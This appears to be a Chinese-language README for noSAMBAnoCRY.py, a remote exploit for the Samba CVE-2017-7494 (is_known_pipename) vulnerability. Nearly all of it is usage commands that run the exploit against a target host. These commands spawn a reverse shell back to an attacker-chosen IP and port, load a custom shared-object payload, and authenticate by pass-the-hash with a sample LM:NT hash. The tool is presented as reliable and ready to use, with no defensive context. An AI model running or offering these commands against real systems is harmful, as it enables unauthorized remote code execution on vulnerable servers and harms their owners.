针对 SAMBA CVE-2017-7494 漏洞(又名 is_know_pipename)的远程利用工具
该利用工具分为 3 个部分:
只要目标存在漏洞且 payload 对目标操作系统和架构正确,该利用工具相当可靠。
针对目标运行利用工具,等待 shell 生成:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
对于 samba 3.5.0 > 3.6.0 版本,只需添加参数 -o 1
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
运行你自己的自定义 .so:
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
对于自定义 samba 端口,使用参数 -p:
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
如果遇到 smbpasswd 哈希且无法破解,现在可以使用参数 --hashes=LM:NT 传递哈希:
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
此仓库灵感来源于仓库:joxeankoret/exploit-CVE-2017-7494 和 Archivaldo